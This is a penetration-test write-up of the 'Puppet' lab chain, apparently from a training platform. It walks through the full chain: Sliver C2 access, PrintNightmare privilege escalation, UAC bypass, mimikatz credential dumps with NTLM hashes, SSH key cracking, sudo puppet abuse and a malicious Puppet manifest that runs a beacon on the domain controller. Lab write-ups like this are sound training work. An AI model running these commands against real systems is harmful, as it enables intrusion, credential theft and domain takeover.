Puppet (Chain)
Machine information
Information Gathering
Nmap scan report for 10.10.235.133
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Nmap scan report for 10.10.235.134
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Nmap scan report for 10.10.235.135
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.5
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
8443/tcp open ssl/https-alt? syn-ack ttl 63
31337/tcp open ssl/Elite? syn-ack ttl 63Services Enumeration
FTP
Anonymous FTP login allowed
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw----r-- 1 0 0 2119 Oct 11 2024 red_127.0.0.1.cfg
|_-rwxr-xr-x 1 0 0 36515304 Oct 12 2024 sliver-client_linuxCompromising FILE01
Initial Access on FILE01
Setting up a tunneling to connect to Sliver Server
During the assessment, the tester found a sliver configuration file along with a sliver client into FTP server which allowed anonymous authentication that were set up for use.
The tester had to set up a tunnel to redirect the traffic from 31337/TCP to 10.10.242.167:31337/TCP to allowed to use the sliver client.
❯ sudo ./socatx64.bin TCP-LISTEN:31337,reuseaddr,fork TCP:10.10.242.167:31337Connecting to Sliver Server
❯ ./sliver-client_linux import red_127.0.0.1.cfg
2025/05/08 23:03:42 Saved new client config to: /home/Intrusionz3r0/.sliver-client/configs/red_127.0.0.1.cfg
❯ ./sliver-client_linux
? Select a server: red@127.0.0.1 (ba37d8712444d4b2)
Connecting to 127.0.0.1:31337 ...
[*] Loaded 22 aliases from disk
[*] Loaded 158 extension(s) from disk
███████╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
All hackers gain reinforce
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
sliver > beacons
ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In
========== ============= ======= =========== ===================== ========== ==================== ================== ======== ======================================== =======================================
d5300ded puppet-mtls 0/0 mtls 10.10.235.134:52369 File01 PUPPET\Bruce.Smith windows/amd64 en-US Thu May 8 23:03:29 EDT 2025 (19s ago) Thu May 8 23:03:59 EDT 2025 (in 11s) Executing bloodhound ingestor to enumerate domain controller
nothing interesting was found
sliver (puppet-mtls) > sharp-hound-4 -t 300 -s -- -c all
[*] sharp-hound-4 output:
2025-05-08T20:26:03.7454873-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-05-08T20:26:04.0287139-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-05-08T20:26:04.0605463-07:00|INFORMATION|Initializing SharpHound at 8:26 PM on 5/8/2025
2025-05-08T20:26:04.3114077-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for puppet.vl : DC01.puppet.vl
2025-05-08T20:26:04.4680598-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-05-08T20:26:04.7187772-07:00|INFORMATION|Beginning LDAP search for puppet.vl
2025-05-08T20:26:04.7187772-07:00|INFORMATION|Testing ldap connection to puppet.vl
2025-05-08T20:26:04.7821325-07:00|INFORMATION|Beginning LDAP search for puppet.vl Configuration NC
2025-05-08T20:26:35.2100270-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 39 MB RAM
2025-05-08T20:26:54.7771727-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-05-08T20:26:54.7928132-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-05-08T20:26:55.0747879-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.PUPPET.VL: SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel:CertificateMappingMethods
2025-05-08T20:26:55.7469843-07:00|INFORMATION|Consumers finished, closing output channel
2025-05-08T20:26:55.7629329-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-05-08T20:26:56.0920325-07:00|INFORMATION|Status: 329 objects finished (+329 6.45098)/s -- Using 50 MB RAM
2025-05-08T20:26:56.0920325-07:00|INFORMATION|Enumeration finished in 00:00:51.3860345
2025-05-08T20:26:56.2173633-07:00|INFORMATION|Saving cache with stats: 270 ID to type mappings.
272 name to SID mappings.
2 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-05-08T20:26:56.2647300-07:00|INFORMATION|SharpHound Enumeration Completed at 8:26 PM on 5/8/2025! Happy Graphing!
[*] Output saved to /tmp/sharp-hound-1_File012735697831.logPrivilege escalation on FILE01
Discovering a print nightmare vulnerability
The tester identified that FILE01 was vulnerable to PrintNightmare which allows to standard user to perform a privilege escalation creating an administrator account.
#echo 'Get-Service -Name Spooler' | base64 -w0 | xclip -sel clip
sliver (puppet-mtls) > sharpsh -- '-e -c R2V0LVNlcnZpY2UgLU5hbWUgU3Bvb2xlcgo='
[*] sharpsh output:
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
# echo 'Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" | Select-Object NoWarningNoElevationOnInstall, UpdatePromptSettings' | base64 -w0|xclip -sel clip
sliver (puppet-mtls) > sharpsh -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtMTTpcU29mdHdhcmVcUG9saWNpZXNcTWljcm9zb2Z0XFdpbmRvd3MgTlRcUHJpbnRlcnNcUG9pbnRBbmRQcmludCIgfCBTZWxlY3QtT2JqZWN0IE5vV2FybmluZ05vRWxldmF0aW9uT25JbnN0YWxsLCBVcGRhdGVQcm9tcHRTZXR0aW5ncwo='
[*] sharpsh output:
NoWarningNoElevationOnInstall UpdatePromptSettings
----------------------------- --------------------
1 1Abusing PrintNightmare to add user to Local Administrator group
Script: CVE-2021-1675
sliver (puppet-mtls) > upload /home/Intrusionz3r0/Documents/Tools/CVE-2021-34527.ps1
[*] Wrote file to C:\temp\CVE-2021-34527.ps1
# echo 'Invoke-Nightmare -DriverName "Xerox" -NewUser "Intrusionz3r0" -NewPassword "Password123!"' | base64 -w0 | xclip -sel clip
sliver (puppet-mtls) > sharpsh -t 100 -- '-u c:\temp\CVE-2021-34527.ps1 -e -c SW52b2tlLU5pZ2h0bWFyZSAtRHJpdmVyTmFtZSAiWGVyb3giIC1OZXdVc2VyICJJbnRydXNpb256M3IwIiAtTmV3UGFzc3dvcmQgIlBhc3N3b3JkMTIzISIK'Verifying the user belongs to Local Administrators
sliver (puppet-mtls) > sa-netuser Intrusionz3r0
[*] Successfully executed sa-netuser (coff-loader)
[*] Got output:
User name: Intrusionz3r0
Full Name: Intrusionz3r0
<SNIF>
Local Group Memberships:
Administrators
sliver (puppet-mtls) > runas --username 'Intrusionz3r0' --password 'Password123!' -p 'C:\ProgramData\Puppet\puppet-update.exe'
[*] Beacon 0f1ae072 puppet-mtls - 10.10.235.134:53415 (File01) - windows/amd64 - Thu, 08 May 2025 23:57:28 EDTPerforming UAC Bypass
During post-exploitation, the tester obtained a shell with medium integrity, then executed UAC-BOF-Bonanza to obtain a high-integrity shell.
Repository: UAC-BOF-Bonanza
sliver (puppet-mtls) > interactive
[*] Using beacon's active C2 endpoint: mtls://pm01.puppet.vl:8443
[*] Tasked beacon puppet-mtls (4614102f)
[*] Session 71ced6b4 puppet-mtls - 10.10.235.134:53476 (File01) - windows/amd64 - Fri, 09 May 2025 00:00:10 EDTsliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe'
[*] Successfully executed SspiUacBypass (coff-loader)
[*] Got output:
SspiUacBypass - Bypassing UAC with SSPI Datagram Contexts
by @splinter_code
Forging a token from a fake Network Authentication through Datagram Contexts
Network Authentication token forged correctly, handle --> 0x29c
Forged Token Session ID set to 1. lsasrv!LsapApplyLoopbackSessionId adjusted the token to our current session
Bypass Success! Now impersonating the forged token... Loopback network auth should be seen as elevated now
Invoking CreateSvcRpc (by @x86matthew)
Connecting to \\127.0.0.1\pipe\ntsvcs RPC pipe
Opening service manager...
Creating temporary service...
Executing 'C:\ProgramData\Puppet\puppet-update.exe' as SYSTEM user...
Deleting temporary service...
Finished
[*] Beacon 606f616d puppet-mtls - 10.10.235.134:53512 (File01) - windows/amd64 - Fri, 09 May 2025 00:01:43 EDT
Dumping logon credentials
sliver (puppet-mtls) > sideload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe "privilege::debug sekurlsa::logonpasswords exit"
Authentication Id : 0 ; 11997146 (00000000:00b70fda)
Session : Interactive from 0
User Name : Intrusionz3r0
Domain : FILE01
Logon Server : FILE01
Logon Time : 5/8/2025 8:55:43 PM
SID : S-1-5-21-2946821189-2073930159-359736154-1000
msv :
[00000003] Primary
* Username : Intrusionz3r0
* Domain : FILE01
* NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
* SHA1 : e30d1c18c56c027667d35734660751dc80203354
* DPAPI : e30d1c18c56c027667d35734660751dc
Authentication Id : 0 ; 609646 (00000000:00094d6e)
Session : Service from 0
User Name : svc_puppet_win_t1
Domain : PUPPET
Logon Server : DC01
Logon Time : 5/8/2025 8:01:31 PM
SID : S-1-5-21-3066630505-2324057459-3046381011-1131
msv :
[00000003] Primary
* Username : svc_puppet_win_t1
* Domain : PUPPET
* NTLM : 784c7b51056579e64f74c71cb013dda6
* SHA1 : e4b6c57180670c42d1894db1daebe833787ad23b
* DPAPI : abe71d756f0b2d9e69b803833ef4869dCompromising Puppet Server
Initial Access on Puppet Server
Lateral movement to svc_puppet_lin_t1
The tester proceeded to migrate to a process running as svc_puppet_lin_t1
sliver (puppet-mtls) > migrate -p 1192
[*] Successfully migrated to 1192
[*] Beacon 1cf59777 puppet-mtls - 10.10.235.134:53619 (File01) - windows/amd64 - Fri, 09 May 2025 00:06:46 EDT
sliver (puppet-mtls) > use 1cf59777
[*] Active beacon puppet-mtls (1cf59777-9d07-4b46-9f67-2f37aca5ea6a)
sliver (puppet-mtls) > interactive
[*] Using beacon's active C2 endpoint: mtls://pm01.puppet.vl:8443
[*] Tasked beacon puppet-mtls (00ab7c39)
[*] Session ad432b0d puppet-mtls - 10.10.235.134:53649 (File01) - windows/amd64 - Fri, 09 May 2025 00:07:49 EDT
sliver (puppet-mtls) > use ad432b0d-c7c3-4114-ba61-d8e5e8d4ed93
[*] Active session puppet-mtls (ad432b0d-c7c3-4114-ba61-d8e5e8d4ed93)
sliver (puppet-mtls) > whoami
Logon ID: PUPPET\svc_puppet_win_t1
[*] Current Token ID: PUPPET\svc_puppet_win_t1
sliver (puppet-mtls) > Discovering a SSH key pairs
sliver (puppet-mtls) > sa-netshares DC01
[*] Successfully executed sa-netshares (coff-loader)
[*] Got output:
Share:
---------------------DC01----------------------------------
ADMIN$
C$
IPC$
it
NETLOGON
SYSVOL
sliver (puppet-mtls) > ls '\\DC01.puppet.vl\it'
\\DC01.puppet.vl\it\ (3 items, 813.9 KiB)
=========================================
drwxrwxrwx .ssh <dir> Sat Oct 12 01:39:50 -0700 2024
drwxrwxrwx firewalls <dir> Sat Oct 12 01:15:05 -0700 2024
-rw-rw-rw- PsExec64.exe 813.9 KiB Sat Oct 12 01:07:00 -0700 2024
sliver (puppet-mtls) > ls '\\DC01.puppet.vl\it\.ssh'
\\DC01.puppet.vl\it\.ssh (2 items, 580 B)
=========================================
-rw-rw-rw- ed25519 472 B Sat Oct 12 01:14:23 -0700 2024
-rw-rw-rw- ed25519.pub 108 B Sat Oct 12 01:40:09 -0700 2024
sliver (puppet-mtls) > download '\\DC01.puppet.vl\it\.ssh\ed25519'
[*] Wrote 472 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Vulnlabs/Puppet/Content/\\DC01.puppet.vl\it\.ssh\ed25519
Cracking the SSH key pair to obtain passphrase
❯ ssh2john ed25519
ed25519:$sshng$6$16$b15359c23be771859026d46fe38e9f2e$290$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010b15359c23be771859026d46fe38e9f2e0000001000000001000000330000000b7373682d656432353531390000002080d2e16eae380ad73bd4a4db4ce1ecbef00215495ed049944f355194eb58d4ef000000a009ba00b5d8c54262bf0103108e5c2fc7859b8506bc58e130062a5e7a661131337f2a3190bedf8aec05e82569487ff897069e6af9ac23869007ca8fe291771b64610f043a7ec86e60d9d23397be4bd8975b841e20bdd9da973cbcbd1294e9a6e771018bf404289c4bbfbb9cdcbf517d28e3134812cfa684e345c9a4c4ee7abbb6690e255d16851608b98e747fda4e3b500fcef2253f3aa82be799ac991c54d505$16$130❯ john ssh_hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
puppet (ed25519)Setting up a Port forwarding to tester machine
sliver (puppet-mtls) > sa-probe 10.10.235.135 22
[*] Successfully executed sa-probe (coff-loader)
[*] Got output:
10.10.235.135:22 OPEN
sliver (puppet-mtls) > portfwd add -b 10.8.5.48:2222 -r 10.10.235.135:22
[*] Port forwarding 10.8.5.48:2222 -> 10.10.235.135:22Changing the format to make it compatible with UNIX
❯ dos2unix ed25519
dos2unix: converting file ed25519 to Unix format...
❯ ssh -i ed25519 -t 'svc_puppet_lin_t1@puppet.vl'@10.10.254.215If you share sensitive files from Windows to Linux, use dos2unix to fix line endings.
If you share from Linux to Windows, use unix2dos to convert them properly.
Connecting to puppet instance
Puppet is an efficient system management tool for centralizing and automating the configuration management process. It can also be utilized as open-source configuration management for server configuration, management, deployment, and orchestration.
GTFOBins: https://gtfobins.github.io/gtfobins/puppet/
❯ ssh -i ed25519 'svc_puppet_lin_t1@puppet.vl'@10.8.5.48 -p 2222
Enter passphrase for key 'ed25519':
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-122-generic x86_64)
<SNIF>
Last login: Sat Oct 12 18:18:52 2024 from 10.8.0.101 Privilege escalation on Puppet Server
Discovering a privilege escalation via sudoers
svc_puppet_lin_t1@puppet.vl@puppet:~$ sudo -l
Matching Defaults entries for svc_puppet_lin_t1@puppet.vl on puppet:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svc_puppet_lin_t1@puppet.vl may run the following commands on puppet:
(ALL) NOPASSWD: /usr/bin/puppet
svc_puppet_lin_t1@puppet.vl@puppet:~$ LFILE="/root/.ssh/authorized_keys"
svc_puppet_lin_t1@puppet.vl@puppet:~$ sudo /usr/bin/puppet apply -e "file { '$LFILE': content => 'MYKEY' }"Compromising Domain Controller DC01
Listing nodes on Puppet instance
According with chatGPT it is possible to execute commands into the manage nodes.
Page: https://lofic.github.io/tips/puppet-list_nodes.html
root@puppet:$ puppet cert list --all
Warning: `puppet cert` is deprecated and will be removed in a future release.
(location: /usr/lib/ruby/vendor_ruby/puppet/application.rb:370:in `run')
+ "dc01.puppet.vl" (SHA256) E4:C3:42:71:83:88:08:07:6A:C5:A1:9D:FA:C2:7E:BB:D5:65:5F:71:9F:D3:BE:11:96:B7:26:CD:4F:5C:68:C6
+ "file01.puppet.vl" (SHA256) 61:ED:86:C3:55:35:36:89:D5:FC:3A:32:05:D1:23:EC:C3:F1:58:E4:D7:9A:6B:3E:65:F4:F2:F2:77:34:B0:CA
+ "pm01" (SHA256) 94:8C:76:E9:D1:43:CA:FF:6C:06:34:80:23:02:8C:49:20:00:B2:43:62:42:16:7B:AF:4F:A6:68:F3:C2:D8:06 (alt names: "DNS:pm01", "DNS:puppet")
+ "pm01.localdomain" (SHA256) 2D:DC:44:F8:49:B6:41:B3:9A:2A:AE:B3:D2:9F:C7:6F:1F:0A:62:00:19:EB:B8:93:D6:C6:65:28:60:D9:F1:B8 (alt names: "DNS:pm01.localdomain", "DNS:puppet")
+ "puppet.puppet.vl" (SHA256) 11:65:85:DB:9F:E4:19:03:04:21:92:4B:19:03:17:6D:29:A9:E9:56:0F:04:A6:16:2B:44:46:A3:33:20:92:9C (alt names: "DNS:puppet", "DNS:puppet.puppet.vl")
root@puppet:~$ mkdir /etc/puppet/code/environments/production/manifests
root@puppet:~$ nano /etc/puppet/code/environments/production/manifests/site.pp node 'dc01.puppet.vl' {
exec { 'reverse_shell':
command => 'C:\\Windows\\System32\\cmd.exe /c \\\\FILE01.puppet.vl\\files\\puppet-update.exe',
path => ['C:\\Windows\\System32', 'C:\\Windows'],
}
}
node default {
notify { 'this node did not match any of the listed definitions': }
}#Check if the sintax file
root@puppet:$ puppet parser validate /etc/puppet/code/environments/production/manifests/site.pp
#Apply the changes
root@puppet:$ puppet apply /etc/puppet/code/environments/production/manifests/site.ppPrivilege escalation on DC01
[*] Beacon 287715d3 puppet-mtls - 10.10.235.133:62076 (DC01) - windows/amd64 - Fri, 09 May 2025 01:57:21 EDT
sliver (puppet-mtls) > use 287715d3
sliver (puppet-mtls) > interactive
[*] Session 7e109fa8 puppet-mtls - 10.10.235.133:62112 (DC01) - windows/amd64 - Fri, 09 May 2025 01:58:56 EDT
sliver (puppet-mtls) > use 7e109fa8
sliver (puppet-mtls) > getsystem
❯ sliver (puppet-mtls) > sharpdpapi machinecredentials
[*] sharpdpapi output:
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.12.0
[*] Action: Machine DPAPI Credential Triage
[*] Secret : DPAPI_SYSTEM
[*] full: F55461801C15D867EA56A3BF183977FA6301E601CD30040C9B9008515A1855D614A6831EF1986886
[*] m/u : F55461801C15D867EA56A3BF183977FA6301E601 / CD30040C9B9008515A1855D614A6831EF1986886
[*] SYSTEM master key cache:
{16ce0746-d7db-4885-9b77-d1418640bfce}:0779112B7A1588F460A7A55723A2D508169C447F
{1762fb49-daaa-41a5-b777-67d3ceae8f8d}:0C4B09075E42E044C01E8FF01A704F8C9802C989
{f75e6a65-79d0-4f1b-ad4c-a2b1cd91dce2}:F92A43B1F2DC16CFC12966AA7F56935370524061
{6cdf826d-e866-4710-ab78-a891d59e20ef}:DFA4DE570ABE63125B03088A6C5C91B77C74DA42
{e2de4c34-3c46-411f-91cb-ab2c9cd2f205}:8819EE03468A4B376AE0FD5EBAEE4471F7AACE80
[*] Triaging System Credentials
Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
CredFile : 39FAB9BA3A19E88594B1D50B5E44AAA4
guidMasterKey : {e2de4c34-3c46-411f-91cb-ab2c9cd2f205}
size : 592
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
LastWritten : 10/12/2024 1:44:00 AM
TargetName : Domain:batch=TaskScheduler:Task:{ACFD7F3B-51A4-4B11-8428-F287E956EC4C}
TargetAlias :
Comment :
UserName : PUPPET\root
Credential : <SNIF>Last updated